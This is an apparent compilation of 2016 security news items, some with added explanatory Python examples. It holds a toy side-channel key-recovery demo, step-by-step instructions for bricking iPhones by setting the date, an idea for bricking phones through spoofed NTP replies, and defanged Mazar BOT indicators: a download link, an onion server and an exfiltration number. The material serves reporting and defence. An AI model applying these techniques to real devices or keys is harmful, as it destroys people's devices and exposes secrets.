Google also rolled out a special advertising program: when terrorist sympathizers type extremism-related words into the search engine, the "top" search results display anti-radicalization links.
Joint efforts like these would act as a digital-age shield to reduce the threat.
However, Facebook has not said how the recipients of the $1,000 credits will be vetted, so it is possible that the credits could be used for personal promotion too.
How-to — Stealing Decryption Key from Air-Gapped Computer in Another Room
16.2.2016 Safety
Stealing Decryption Key from Air-Gapped Computer in Another Room
Air-gapped computers, believed to be the most secure computers on the planet, have become a regular target for researchers in recent years.
Air-gapped computers are ones that are isolated from the Internet and from any other computer connected to the Internet or an external network, so hackers cannot remotely access their contents.
But you need to think again before calling them 'Safe.'
A team of security researchers from Tel Aviv University and Technion have discovered a new method to steal sensitive data from a target air-gapped computer located in another room.
The team is the same group of researchers who have experimented with a number of different methods to extract data from a computer. Last year, the team demonstrated how to extract secret decryption keys from computers using just a radio receiver and a piece of pita bread.
In 2014, the team devised a special digitizer wristband with which the cryptographic key used to secure data stored on a machine could be extracted just by touching the chassis of the computer.
Extracting Secret Decryption Key in Seconds
Now taking its experiments a step further, the team of researchers, including Daniel Genkin, Lev Pachmanov, Itamar Pipman, and Eran Tromer, has demonstrated a similar way to extract a secret decryption key within seconds, but this time from an air-gapped machine in another room.
Although hacking air-gapped machines to steal cryptographic keys has been carried out in the past, this is the first time such an attack has successfully targeted a computer running Elliptic Curve Cryptography (ECC).
Elliptic Curve Cryptography is a family of public-key algorithms, ECDH key exchange among them, that is widely used in everything from securing websites with Transport Layer Security (TLS) to securing messages.
How Does the Method Work?
Researchers used a method known as a side-channel attack: an attack that extracts the secret cryptographic key from a system not by breaking the mathematics but by analyzing physical leakage, such as the pattern of memory utilization or the electromagnetic emissions of the PC, produced during the decryption process.
"By measuring the target's electromagnetic emanations, the attack extracts the secret decryption key within seconds, from a target located in an adjacent room across a wall," reads the recently published paper [PDF].
Specifically, the team obtained the private key from a laptop running GnuPG, the popular implementation of OpenPGP. The GnuPG developers have since rolled out countermeasures to this method, making GnuPG more resistant to this side-channel attack.
Equipment Required:
The equipment used in the experiment hack included:
An antenna
Amplifiers
A software-defined radio
A laptop
During the experiment, the researchers first sent the target laptop a specific ciphertext (an encrypted message chosen by the attacker).
While the laptop decrypted the chosen ciphertext, the researchers measured its EM leakage, "focusing on a narrow frequency band."
The signal was then processed to produce a clear trace revealing information about the operands used in the ECC computation, which in turn revealed the secret key.
The experiment was carried out through a 15-centimeter-thick wall reinforced with metal studs, according to the researchers.
"The experiment...was conducted using a Lenovo 3000 N200 laptops, which exhibit a particularly clear signal," the paper reads. "The attacks are completely non-intrusive: we didn't modify the targets or open their chassis."
The researchers extracted the secret key after observing around 66 decryption operations, each lasting about 0.05 seconds, for a total measurement time* of about 3.3 seconds.
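What the trace-to-key step looks like, as an added example that is not the researchers' code or GnuPG's: the Python below runs a textbook double-and-add scalar multiplication on a toy curve (an assumption; the real attack targets a full-size curve in GnuPG's libgcrypt and reads far subtler, operand-dependent leakage) and records one symbol per doubling or addition, which is the coarsest thing an EM trace of a naive implementation reveals. recover_key turns that sequence back into the secret scalar. A Montgomery ladder, the kind of uniform-operation countermeasure used against this class of leak, performs the same addition-then-doubling for every key bit, so its trace carries no key information.

```python
# Toy curve y^2 = x^3 + x + 1 over F_23: 28 points, G = (0, 1) generates the group.
# Curve, point and the 'D'/'A' trace model are assumptions for illustration only.
P_MOD, A = 23, 1
G = (0, 1)


def inv(x: int) -> int:
    return pow(x % P_MOD, -1, P_MOD)


def point_add(P, Q):
    """Affine point addition; None is the point at infinity."""
    if P is None:
        return Q
    if Q is None:
        return P
    x1, y1 = P
    x2, y2 = Q
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None                      # P + (-P), including doubling a point with y = 0
    if P == Q:
        lam = (3 * x1 * x1 + A) * inv(2 * y1) % P_MOD
    else:
        lam = (y2 - y1) * inv(x2 - x1) % P_MOD
    x3 = (lam * lam - x1 - x2) % P_MOD
    y3 = (lam * (x1 - x3) - y1) % P_MOD
    return (x3, y3)


def point_double(P):
    return point_add(P, P)


def double_and_add(k: int, P, trace: list):
    """Left-to-right binary scalar multiplication. Each doubling appends 'D' and each
    addition 'A' to trace: the model of what a probe sees, one event per operation."""
    R = None
    for bit in bin(k)[2:]:
        R = point_double(R)
        trace.append("D")
        if bit == "1":
            R = point_add(R, P)
            trace.append("A")
    return R


def montgomery_ladder(k: int, P, trace: list):
    """Same result, but exactly one addition and one doubling per bit whatever the key."""
    R0, R1 = None, P
    for bit in bin(k)[2:]:
        if bit == "0":
            R1 = point_add(R0, R1)
            R0 = point_double(R0)
        else:
            R0 = point_add(R0, R1)
            R1 = point_double(R1)
        trace.extend("AD")
    return R0


def recover_key(trace: list) -> int:
    """The attacker's view of a double-and-add trace: a 'D' followed by 'A' is a 1 bit,
    a lone 'D' is a 0 bit. The leading bit of the key is always 1."""
    bits, i = [], 0
    while i < len(trace):
        if trace[i] != "D":
            raise ValueError("trace does not start each bit with a doubling")
        if i + 1 < len(trace) and trace[i + 1] == "A":
            bits.append("1")
            i += 2
        else:
            bits.append("0")
            i += 1
    return int("".join(bits), 2)


if __name__ == "__main__":
    secret = 13                                  # the decryption key being leaked
    leaky, safe = [], []
    assert double_and_add(secret, G, leaky) == montgomery_ladder(secret, G, safe)
    print("leaky trace:", "".join(leaky), "-> recovered key", recover_key(leaky))
    print("ladder trace:", "".join(safe), "(identical for every 4-bit key)")
```

The ladder is only the first step of a real countermeasure: the operation sequence becomes uniform, but the operands still differ per key bit, and that is the class of leakage the paper exploits, which is why a constant-sequence implementation alone is not enough.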
Future Challenges:
Future challenges for the researchers include non-chosen-ciphertext attacks, attacking other cryptographic primitives (such as symmetric encryption), and minimizing the number of decryption operations needed to extract the secret key.
The team will present its work at the upcoming RSA Conference on March 3. For an in-depth explanation with the technical details of the attack, we recommend reading the research paper [PDF].
*Note: When the team says the secret key was obtained in 'seconds', that is the total measurement time, not how long the attack takes to carry out end to end.
Ransomware takes the Hollywood Presbyterian Medical Center offline, attackers demand $3.6M
16.2.2016 Virus
Cyber criminals demanded $3.6M after a ransomware attack took the systems at the Hollywood Presbyterian Medical Center offline.
In the “2016 Cyber Security Predictions: From Extortion to Nation-state Attacks” that I published at the end of 2015, I predicted that criminal extortion would reach levels never seen before.
“Cyber criminals will threaten victims with ransomware and DDoS attacks in an attempt to extort money to stop the attacks or to allow victims to rescue the locked files. Ransomware will be used to target IoT devices like smart TVs, wearables and medical devices,” I wrote in a blog post, and the facts are confirming my expectations.
In recent weeks, a new wave of ransomware has targeted millions of users in Europe, but the news is probably more sensational when the victims are public services like hospitals or power facilities. In January, the Israeli Public Utility Authority suffered a serious incident that caused problems with the institution's systems; now we discuss more disconcerting news: the computers at the Hollywood Presbyterian Medical Center have been down for more than a week due to a ransomware infection.
A local computer consultant told the media that the ransom demanded was about 9,000 BTC, or just over $3.6 million.
The situation has since been restored and all machines sanitized, while law enforcement continues to investigate the case. Computers storing patient data, CT scans, hospital documentation and lab data went offline.
Unfortunately, the staff at the Hollywood Presbyterian Medical Center faced the paralysis of internal services due to the cyber attack.
The hospital reported “significant IT issues and declared an internal emergency” on Feb. 5, said hospital president and CEO Allen Stefanek.
NBC Los Angeles reported the case of a patient who had to drive more than an hour to Palmdale to pick up medical test results in person.
Stefanek added that the hospital’s emergency room systems have been sporadically impacted by the ransomware, forcing the transfer of some patients to other hospitals.
The hospital continued to operate, but every activity relying on IT systems was affected; registrations and medical records were logged on paper.
The Hollywood Presbyterian Medical Center has not provided technical details about the incident, and it is not clear which malware family infected the systems.
Approximate hardware improves Bitcoin mining profits by 30 percent
16.2.2016 IT
A team of Illinois-based researchers has shown how to improve the profitability of Bitcoin mining by 30 percent.
Bitcoin mining is becoming ever more costly in terms of computational resources, but a team of Illinois-based researchers has conducted a study on how to speed up the process.
The group, led by Indian scientist Rakesh Kumar and including Matthew Vilim and Henry Duwe, has designed new Bitcoin mining hardware built from “approximate” circuits.
The experts will present their study at the Design Automation Conference in June 2016.
According to the researchers, the approximate hardware could improve Bitcoin mining profits by 30 percent.
“We exploit this inherent tolerance to inaccuracy by proposing approximate mining circuits that trade off reliability with area and delay. These circuits can then be operated at Better Than Worst-Case (BTWC) to enable further gains. Our results show that approximation has the potential to increase mining profits by 30%” states a paper published by the researchers.
The approximate hardware tolerates imperfections in the circuits rather than engineering them out: an approximate adder is smaller and faster than an exact one, but occasionally returns a wrong sum. In mining terms an error is either a false positive, where the hardware reports a hash that appears to meet the target but does not, or a false negative, where a hash that really does meet the target is missed.
The researchers found that these errors cost little: a false positive is caught when the candidate hash is re-checked exactly, and a false negative only loses one nonce out of billions.
The approximate hardware therefore does not scan for errors; it accepts them, and relies on the verification of every candidate hash to discard the false positives.
“Bitcoin mining is a particularly good candidate for approximation because its parallelism mitigates error propagation and a built-in verification system detects any false positives,” reads the paper. “Furthermore, we have identified adders as beneficial choices for approximation in hashing cores in a mining ASIC.” continues the paper. “However, not all approximate adders yield increases in profit. Profits are maximized by adders that minimize delay at the expense of area, and approximate adders should be chosen accordingly. Moreover, profits may be improved by operating the hashing cores at Better Than Worst-Case (BTWC) operating points, past their nominal frequencies”
If you want to dig into the research, take a look at the paper titled “Approximate Bitcoin Mining,” but be warned that it is not an easy read.
Russia Wants to Kick Foreign Tech Companies Out Of The Nation
15.2.2016 Safety
The man who wants to kick Microsoft, Google and Apple out of his country himself uses Gmail and a Mac.
The newly appointed Internet tsar German Klimenko, the first Internet advisor to Vladimir Putin, wants to push the American giants out of Russia.
In a 90-minute interview with Bloomberg, Klimenko expressed his desire to shrink the presence of foreign tech giants in Russia.
Google & Apple have to Pay 18% more VAT
As part of this, Klimenko plans to raise taxes on foreign companies, including Google and Apple, by charging 18% VAT on their applications and services sold online.
It is estimated that Apple, Google and other companies earn nearly RUB 300 billion (£2.7 billion, US$4 billion) in revenue every year from Russia.
"When you buy an app from Google Play or the App Store anywhere in Europe, VAT is charged at the place of payment, but not here in our banana republic," says Klimenko.
The proposed move will be backed by Andrei Lugovoi, a parliamentary lawmaker and former KGB (the Soviet Committee for State Security) agent, whom the UK has accused of assassinating former agent Alexander Litvinenko in London.
As the first Internet advisor, Klimenko is focused on expanding the Russian Internet market by promoting home-grown projects such as Yandex, Mail.ru, the VK social network and more.
Klimenko is also pushing to replace the Windows operating system with a customized Linux in government offices. He claimed that 22,000 municipal governments are ready to install Linux.
This mirrors the path China took earlier by building its own customized operating system, NeoKylin, to assert a national identity in cyberspace.
Foreign Companies are Threat to National Security
Google tracks everything and responds to 32,000 requests a year from US agencies, but it won’t answer one from Russia, according to Klimenko.
Both nations, it seems, are unhappy with the worldwide surveillance programs run by the US intelligence agency NSA and its British counterpart GCHQ, which intrude into private life.
“We have to consider this as a kind of potential threat to our national security,” he said.
This stringent move would put an end to foreign snooping programs, a major concern for millions, and would also give a boost to the Russian stock exchange.
Russia appears to be taking inspiration from China, which has made its mark in many fields, for example:
Exporting its own smartphones, such as those made by Xiaomi, to many countries.
Implementing the Great Firewall.
Weibo, a social networking service with more than 100 million active users.
The Baidu search engine.
And many more...
Kicking Off: A Feasible Option?
Kicking foreign technologies out of the nation would raise many eyebrows, as today's world is wired together, and healthy relationships with foreign counterparts depend on that connectivity.
“The way it’s done in North Korea or China with its firewall probably doesn’t fit us, but it’s only a matter of time,” Klimenko said. “It won’t be fatal if Google leaves Russia -- Yandex and Mail.ru have similar technologies.”
Espionage aside, the proposed plan would hinder future joint developments that could benefit the nation.
If every country followed the same crooked path, our planet would be no different from other lifeless planets, with everyone isolated within their own borders.
Let's see what other demands are cooking up in the mind of Russia's new Internet Tsar!
Warning — Setting This Date On iPhone Or iPad Will Kill Your Device Permanently
15.2.2016 Apple
Don’t Try this at Home!
An interesting software bug has been discovered in Apple's iOS operating system that could permanently kill your iPhone, iPad or iPod touch.
Yes, you heard me right.
An issue with the date and time system in iOS emerged recently when Reddit users started warning people that changing an iPhone's, or any iOS device's, date to January 1, 1970 will brick it forever.
Video Demonstration
You can watch the whole process in the video below. Even the regular recovery tricks do not work.
So you are strongly advised not to try this with your iOS device, unless you want to book a trip to your local Apple Store.
While I don’t have any intention or desire to try it out on my iPhone 6s to confirm the authenticity of the bug, it is pretty clear from reports that seem legitimate.
YouTuber Zach Straley first discovered the issue, which was later confirmed by iClarified, who tested the trick on an iOS device.
Affected iOS Devices
This bug affects any iOS device with a 64-bit A7, A8, A8X, A9 or A9X processor running iOS 8 or newer, including iPhones, iPads and iPod touches. Devices with 32-bit processors are reportedly not affected.
How the Bug Kills the iPhone?
Basically, the whole process comes down to this:
Set the date to January 1, 1970 via Settings on your iOS device, reboot the device, and you are done.
Your iPhone or iPad will no longer boot and will be stuck at the Apple logo. Even a recovery mode or DFU mode restore will not bring the device back; it remains stuck on the boot screen.
Your device will reportedly not come back on its own, and the only way to get it working again is to take it to an Apple Store.
The Only Way to Get Your iPhone Back
The bug is believed to be related to the UNIX timestamp epoch and causes the kernel to crash. The only known way to get the device back is to open its casing and physically disconnect the battery from the logic board, which in practice means a visit to Apple's Genius Bar.
This resets the iPhone's date and allows it to boot.
While there is no other fix at the moment, Apple is expected to release a software update to fix the bug and unbrick affected iOS devices.
Some users say that letting the battery drain fully, changing the SIM card, or waiting about five hours can bring the device back, but you are still advised not to try this on your device, as there is no guarantee these tricks will work.
Wanna Mine Bitcoins Faster? Researchers Find New Way to Do it
15.2.2016 IT
Wanna Mine Bitcoins Faster? Researchers Find New Way to Make Bitcoin
A new machine for Bitcoin Mining called "Approximate Hardware" would make Bitcoin mining easier.
Bitcoin has gained tremendous popularity among virtual currencies over the past few years thanks to its decentralized design.
Mining a single Bitcoin is no cakewalk, as it requires an enormous amount of computing power.
To reduce that cost and mine Bitcoins faster, researchers have conducted a study and found a new way to make the mining process more efficient.
How to Mine Bitcoins Faster?
A team of Illinois-based researchers led by Indian scientist Rakesh Kumar has designed new "approximate" hardware that could improve the profitability of Bitcoin mining by 30 percent.
The proposed system makes use of faults in the hardware, which show up in two forms:
False positives, where the hardware reports a hash that appears to meet the mining target but actually does not.
False negatives, where a hash that really does meet the target is missed.
By tolerating these imperfections instead of engineering them out, the mining hardware can be made smaller and faster than the exact hardware used today.
Approximate Bitcoin Mining
The approximate hardware does not hunt for these errors; it accepts that some hashes will be computed wrongly and relies on the verification of every candidate hash to discard the false positives.
"Bitcoin mining is a particularly good candidate for approximation because its parallelism mitigates error propagation and a built-in verification system detects any false positives," reads the paper. "Furthermore, we have identified adders as beneficial choices for approximation in hashing cores in a mining ASIC."
Dr. Kumar also said that his team's goal is not to build perfect Bitcoin mining hardware, but that their research should help in designing much better mining hardware in the near future.
Kumar and his team, including Matthew Vilim and Henry Duwe, will present their work in a talk titled "Approximate Bitcoin Mining" at the Design Automation Conference (electronic design) in June 2016.
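How the verification step absorbs the errors, as an added example that serves both this article and the “Approximate hardware improves Bitcoin mining profits by 30 percent” piece above. The Python below is not the researchers' design: the approximate core is modelled as an exact double-SHA-256 whose output is corrupted with an assumed probability error_rate (real approximate adders fail on particular operand patterns, not at random), the throughput gain speedup is an assumed figure, and the block header is a constructed input. Every nonce the approximate core reports is re-checked with the exact hash, so a false positive costs one extra hash and a false negative shows up as lost revenue.

```python
import hashlib
import random

TARGET_BITS = 10  # toy difficulty: a valid hash has its top 10 bits clear


def sha256d(data: bytes) -> int:
    """Bitcoin's double SHA-256, returned as an integer (the exact reference computation)."""
    return int.from_bytes(hashlib.sha256(hashlib.sha256(data).digest()).digest(), "big")


def meets_target(h: int) -> bool:
    return h >> (256 - TARGET_BITS) == 0


def approximate_core(exact: int, error_rate: float, rng: random.Random) -> int:
    """Model of an approximate hashing core (an assumption, not the paper's circuit):
    with probability error_rate the core emits a corrupted digest instead of the exact one."""
    if rng.random() < error_rate:
        return exact ^ rng.getrandbits(256)
    return exact


def mine(header: bytes, n_nonces: int, error_rate: float, speedup: float, seed: int = 1) -> dict:
    """Scan nonces with the approximate core and re-check every reported hit exactly.
    speedup is the assumed throughput gain of the smaller, faster approximate circuit."""
    rng = random.Random(seed)
    valid = candidates = verified = 0
    for nonce in range(n_nonces):
        exact = sha256d(header + nonce.to_bytes(4, "little"))
        is_valid = meets_target(exact)
        valid += is_valid
        if meets_target(approximate_core(exact, error_rate, rng)):
            candidates += 1        # the core reports a hit
            verified += is_valid   # the exact verifier accepts or rejects it
    return {
        "valid": valid,                              # hits an exact core would have found
        "candidates": candidates,                    # hits reported by the approximate core
        "verified": verified,                        # reported hits that survive verification
        "false_positives": candidates - verified,    # bogus hits, each costing one exact hash
        "false_negatives": valid - verified,         # real hits the core missed (lost revenue)
        "relative_rate": speedup * verified / valid if valid else 0.0,
    }


if __name__ == "__main__":
    header = b"constructed-block-header-not-a-real-block"  # constructed sample input
    for rate in (0.0, 0.1, 0.2, 0.5):
        print(rate, mine(header, 50_000, error_rate=rate, speedup=1.3))
```

relative_rate is the quantity the paper trades off: the approximate circuit's speed-up multiplied by the fraction of real hits it still finds. The run shows the break-even directly: once the error rate eats more than the assumed speed-up gains, the approximate miner earns less than an exact one, and false positives never corrupt the result because nothing unverified is ever submitted.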
This Android Malware Can Root Your Device And Erase Everything
15.2.2016 Android
A new Android malware making waves recently has the ability to gain administrator privileges on your smartphone and completely erase the phone's storage.
Dubbed Mazar BOT, the malware is loaded with so many hidden capabilities that security researchers are calling it dangerous: it can turn your smartphone into a zombie in a hacker's botnet.
Mazar BOT was discovered by Heimdal Security while its researchers were analyzing an SMS message sent to random mobile numbers and locations.
How Mazar BOT Works
Unlike other Android malware that spreads by tricking users into installing an app from third-party app stores, Mazar spreads via spam SMS or MMS messages that carry a link to a malicious APK (Android app package).
Once the user clicks the link, the APK file is downloaded to the Android device; when run, it prompts the user to install a new application.
This app carries the generic name "MMS Messaging" and asks for device administrator privileges. Because the name looks ordinary, most users grant the request.
What Makes Mazar BOT So Nasty
Once granted these privileges, Mazar BOT can do a variety of nasty things on your Android device, such as:
Gain boot persistence to help survive device restarts
Send and Read your SMS messages
Make Calls to your contacts
Read the phone's state
Plague phone's control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device's storage (the most critical capabilities of all)
Mazar BOT Browses Internet Anonymously Using TOR
Besides these tasks, Mazar BOT can also download and install the legitimate Tor (The Onion Router) Android app on your smartphone, without your consent or permission.
Using the Tor app, the malware is able to reach the Internet anonymously via the Tor network.
Once Tor is installed on the victim's phone, Mazar BOT sends a "Thank you" message to an Iranian phone number (9876543210), along with the device's location.
In some instances, Mazar BOT also installs an Android app called Polipo Proxy, which sets up a proxy on the device and allows the malware's operators to intercept the victim's web traffic and carry out man-in-the-middle (MitM) attacks.
Who is Behind This Awful Malware?
Mazar BOT is believed to be distributed by a Russia-based group of cyber criminals.
One clue supporting this assumption: Mazar BOT will not install on Android phones configured with the Russian language, as its code checks the device language and stops the installation process when it is Russian.
Another clue: there is an unwritten law in Russia that says "if cyber criminals don't go after Russians, Russian authorities will not go after them." Moreover, there is no indication yet that this Mazar BOT campaign has affected anyone in Russia.
Until now, Mazar BOT for Android had only been advertised for sale on several Russian underground (Dark Web) forums; this is the first time the code has been seen in active attacks.
How to Protect Yourself from Mazar BOT
There are standard protection measures you need to follow to remain unaffected:
NEVER click on links in SMS or MMS messages sent to your phone.
Go to Settings → Security → Turn OFF "Allow installation of apps from sources other than the Play Store" option.
Always keep an up-to-date Anti-virus app on your Android devices.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
The IPT ruled that GCHQ spies can legally hack any electronic devices
15.2.2016 BigBrothers
The British intelligence agency GCHQ has a license to hack computers and devices, the UK’s Investigatory Powers Tribunal (IPT) has ruled.
This means the UK government is giving its intelligence agency full power to spy on Britons as well as people living abroad.
The verdict was issued on Friday after Privacy International and seven ISPs launched a legal challenge against the conduct of GCHQ, whose hacking operations were revealed by documents leaked by NSA whistleblower Edward Snowden.
GCHQ is responsible for “persistent” illegal hacking of electronic devices and networks worldwide, the Investigatory Powers Tribunal (IPT) was told.
The popular whistleblower Edward Snowden disclosed a collection of documents revealing the extent of surveillance programmes carried out by the Five Eyes alliance. Snowden revealed the existence of secret surveillance activities such as the Tempora operation and hacking platforms such as the Smurf suite.
GCHQ admitted for the first time that the government monitoring station in Cheltenham carries out “persistent” and “non-persistent” Computer Network Exploitation (CNE) against targets in the UK and abroad.
In 2013, the tribunal was told, 20% of GCHQ’s intelligence reports contained information obtained through hacking operations.
The case was heard at the IPT, which deals with complaints against surveillance by UK intelligence, in a four-day hearing at the Rolls Building in central London.
“The [legal] regime governing CNE … remains disproportionate,” Ben Jaffey, counsel for Privacy International, told the tribunal. “Given the high potential level of intrusiveness, including over large numbers of innocent persons, there are inadequate safeguards and limitations.”
Jaffey highlighted that GCHQ’s hacking alters the targeted systems, an activity that is not considered legal.
“The use of computer network exploitation by GCHQ, now avowed, has obviously raised a number of serious questions, which we have done our best to resolve in this Judgment,” reads the lengthy ruling from the Investigatory Powers Tribunal (IPT).
“Plainly it again emphasises the requirement for a balance to be drawn between the urgent need of the Intelligence Agencies to safeguard the public and the protection of an individual’s privacy and/or freedom of expression.”
The tribunal examined the legality of the methods used by British intelligence.
The tribunal “investigates and determines complaints of unlawful use of covert techniques by public authorities infringing our right to privacy.”
In some cases, the GCHQ installed malware on targeted systems and hacked mobile devices with its Smurf suite.
In November 2015, the technological abilities of the UK’s National Crime Agency (NCA) were revealed for the first time in a collection of documents: the British law enforcement agency has “equipment interference” (EI) capabilities, which allow it to hack into mobile devices and computers.
Eric King, deputy director of Privacy International, who analyzed the documents, noticed a section with an explicit reference to the capability of UK law enforcement to conduct “equipment interference.”
“Equipment interference is currently used by law enforcement agencies and the security and intelligence agencies,” states the section. The documents also reveal that “more sensitive and intrusive techniques” are available to a “small number of law enforcement agencies, including the National Crime Agency.”
UK law enforcement already in hacking business according to IPBill. pic.twitter.com/SAGzw2w4Fh
— Eric King (@e3i5) 4 November 2015
GCHQ's hacking operations were conducted under a self-imposed code of conduct, and the IPT recognized these activities as legal, to the chagrin of privacy advocates.
“We are disappointed that the IPT has not upheld our complaint and we will be challenging its findings,” said Scarlet Kim, legal officer at Privacy International.
I wonder at this point what the repercussions of such a decision will be at the international level. In effect, it legitimizes any government hacking the systems of foreign states. It is the Wild West.
Don’t set your iPhone’s date to January 1, 1970 or you will brick it
15.2.2016 Apple
Another embarrassing problem for Apple iOS mobile devices (iPhone and iPad): setting the device's date to January 1st, 1970 will brick it. Don’t try it!
Another embarrassing problem for Apple iOS mobile devices: a software flaw can be triggered to permanently kill your iPhone, iPad or iPod touch. The issue affects the iOS date and time system and is triggered by setting the date to January 1, 1970. The news appeared recently in Reddit discussions warning users about a flaw that could brick an iPhone forever, and the presence of the flaw has been confirmed by iClarified.
“Setting the date of your iPhone to January 1st, 1970 will brick your device, according to users across the web and confirmed by iClarified. The bug will affect any 64-bit iOS device that is powered by the A7, A8, A8X, A9, and A9X. 32-bit iOS devices are reportedly not affected by this issue.” reported iClarified.
Meanwhile on Reddit, users warned other Apple users by sharing the following message: “When the date of a 64-bit iOS device is set to January 1, 1970, the device will fail to boot. Connecting the device to iTunes and restoring the device to factory defaults will not put the device back in working order. Instead, a physical repair is required. When connected to public Wi-Fi, iPhone calibrates its time settings with an NTP server. Theoretically, attackers can send malicious NTP requests to adjust every iPhone’s time settings to January 1, 1970, hence brick every iPhone connected to the same network. According to /u/sarrius, worldwide Apple Stores are being made aware that disconnecting the battery and reconnecting fixes the issue. It should be common knowledge to all stores worldwide by tomorrow.”
Be careful and do not try to trigger the flaw with your iOS device, the YouTuber Zach Straley first published a Video PoC of the issue.
As explained in the video, after set up the date to January 1, 1970, trying to reboot the device users will notice that the iPhone or iPad will no longer boot and will be frozen displaying the Apple logo.
“Since a DFU or recovery mode restore will not unbrick your device, we strongly recommend that you do not try to test this bug. Users report that while a restore may succeed, the device will still fail to boot after the restore.” continues iClarified.
Let’s wait for a software fix from Apple.
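The Reddit post above raises the possibility of a hostile time source pushing a device's clock back to the epoch. The page does not describe how iOS actually synchronises its clock, so what follows is an added, generic example (not Apple's code) of the plausibility check any client should apply to a network time reply before stepping its clock: parse the 48-byte NTP reply, convert the transmit timestamp to Unix time, and refuse anything earlier than a build-date floor or far away from the current clock. The server reply is constructed inline for the example, and MIN_PLAUSIBLE is an assumed build date.

```python
import struct
from datetime import datetime, timezone

# NTP timestamps count seconds since 1900-01-01; Unix time since 1970-01-01.
# The Unix epoch therefore sits at NTP seconds 2208988800.
NTP_UNIX_DELTA = 2208988800


def unix_to_ntp(unix_seconds: int) -> int:
    """Convert Unix seconds to the 32-bit NTP seconds field."""
    return (unix_seconds + NTP_UNIX_DELTA) & 0xFFFFFFFF


def ntp_to_unix(ntp_seconds: int) -> int:
    """Convert the 32-bit NTP seconds field to Unix seconds."""
    return ntp_seconds - NTP_UNIX_DELTA


def build_server_reply(unix_seconds: int) -> bytes:
    """Construct a minimal 48-byte NTPv4 server reply (mode 4, stratum 2)
    whose transmit timestamp is the given Unix time. Constructed for this
    example only; a real reply also fills the reference/originate/receive
    timestamps, which are left zero here."""
    li_vn_mode = (0 << 6) | (4 << 3) | 4          # LI=0, VN=4, mode=4 (server)
    header = struct.pack("!BBBb", li_vn_mode, 2, 6, -20)  # stratum, poll, precision
    root_delay = root_dispersion = 0
    ref_id = b"GPS\0"
    zero_ts = struct.pack("!II", 0, 0)
    tx_ts = struct.pack("!II", unix_to_ntp(unix_seconds), 0)
    return (header
            + struct.pack("!II", root_delay, root_dispersion)
            + ref_id
            + zero_ts      # reference timestamp
            + zero_ts      # originate timestamp
            + zero_ts      # receive timestamp
            + tx_ts)       # transmit timestamp (bytes 40..47)


def parse_transmit_time(packet: bytes) -> int:
    """Return the transmit timestamp of an NTP server reply as Unix seconds."""
    if len(packet) < 48:
        raise ValueError("short NTP packet")
    mode = packet[0] & 0x07
    if mode != 4:
        raise ValueError("not a server reply (mode %d)" % mode)
    tx_seconds, _fraction = struct.unpack("!II", packet[40:48])
    return ntp_to_unix(tx_seconds)


# Lower bound: a device cannot legitimately be told it is earlier than the
# time its firmware was built. Assumed build date for this example.
MIN_PLAUSIBLE = int(datetime(2016, 1, 1, tzinfo=timezone.utc).timestamp())


def accept_network_time(packet: bytes, now_unix: int,
                        min_plausible: int = MIN_PLAUSIBLE,
                        max_skew: int = 10 * 365 * 86400) -> bool:
    """Plausibility check a client should apply before stepping its clock:
    reject times before the build-date floor or implausibly far from now."""
    t = parse_transmit_time(packet)
    if t < min_plausible:
        return False
    if abs(t - now_unix) > max_skew:
        return False
    return True
```

A reply carrying the Unix epoch parses correctly (it is a valid NTP timestamp, 2208988800 seconds into the NTP era) but fails the plausibility check, which is the point: the transport cannot be trusted to deliver sane values, so the consumer has to bound them.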
Mazar Bot actively targeting Android devices and wiping them
15.2.2016 BotNet
A new malware dubbed Mazar Bot is threatening Android users and has the ability to gain root access to the mobile device and completely wipe it.
The new threat, named Mazar BOT, can gain root access to the mobile device and completely wipe its storage.
Mazar BOT could be used by threat actors to recruit victims’ Android devices into a mobile botnet.
The experts at Heimdal Security spotted the Mazar BOT in live attacks while they were investigating an SMS message sent to random mobile numbers and locations. Mazar BOT spreads via a spam SMS or MMS that arrives with the following link (sanitized by Heimdal Security) to a malicious APK:
“You have received a multimedia message from +[country code] [sender number]. Follow the link http: //www.mmsforyou [.] Net / mms.apk to view the message.”
Once the victim taps the link, the APK file is downloaded to the Android device. When it is run, it prompts the user to install a new application with the generic name MMS Messaging, which asks for device administrator privileges, and most users grant them.
The admin privileges allow the threat actors to perform the following operations:
Gain boot persistence to help survive device restarts
Send and Read your SMS messages
Make Calls to your contacts
Read the phone’s state
Plague phone’s control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device’s storage (the most critical capability of all)
The researchers at Heimdal Security observed that Mazar BOT is also able to download and install a legitimate Tor Android app on the infected device without any user interaction.
“In the next phase of the attack, the infection will unpack and run the TOR application, which will then be used to connect to the following server: http: // pc35hiptpcwqezgs [.] Onion.
After that, an automated SMS will be sent to the number 9876543210 (+98 is the country code for Iran) with the text message: “Thank you”. The catch is that this SMS also includes the device’s location data.” continues the post.
The malware uses the Tor app to route its traffic through the Tor network anonymously. The experts also noticed that Mazar BOT installs an Android app called Polipo Proxy, which acts as a local proxy for the user’s traffic; the malware’s operators could use it to spy on the victim’s web traffic and carry out man-in-the-middle (MitM) attacks.
The experts believe Mazar BOT is operated by a Russian cybercriminal gang; tellingly, the malware refuses to install on Android phones in Russia. Analysis of the malware’s code revealed instructions that abort the installation on phones configured with the Russian language.
Another clue that suggests the involvement of Russian bad actors is that the Mazar BOT is offered for sale on several Russian underground forums.
In order to protect mobile devices from this threat follow these simple suggestions:
Don’t click on links in SMS or MMS messages sent to your phone.
Go to Settings → Security → Disable the option “Allow installation of apps from sources other than the Play Store.”
Install and keep an up-to-date Anti-virus solution on your Android device.
Avoid unsecured Wi-Fi hotspots and keep your Wi-Fi turned OFF when not in use.
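As an added example (not Heimdal's code and not taken from the malware), here is a Python triage script that checks an Android device, over adb, for the pattern described above: a sideloaded third-party app holding device-administrator rights with wipe-data or force-lock policies. It parses the output of `adb shell pm list packages -3` (third-party packages only) and `adb shell dumpsys device_policy` (active device admins and their policies). The two outputs embedded below are constructed, the package name com.mms.messaging is hypothetical, and the dumpsys layout is an assumption that should be checked against a real device before relying on the parser.

```python
import re

# Constructed sample of `adb shell pm list packages -3` (third-party apps only).
PM_LIST_OUTPUT = """package:com.mms.messaging
package:com.whatsapp
"""

# Constructed sample of `adb shell dumpsys device_policy`. The layout is an
# assumption for this example; compare with your device's output.
DUMPSYS_OUTPUT = """Current Device Policy Manager state:
  Enabled Device Admins (User 0, provisioningState: 0):
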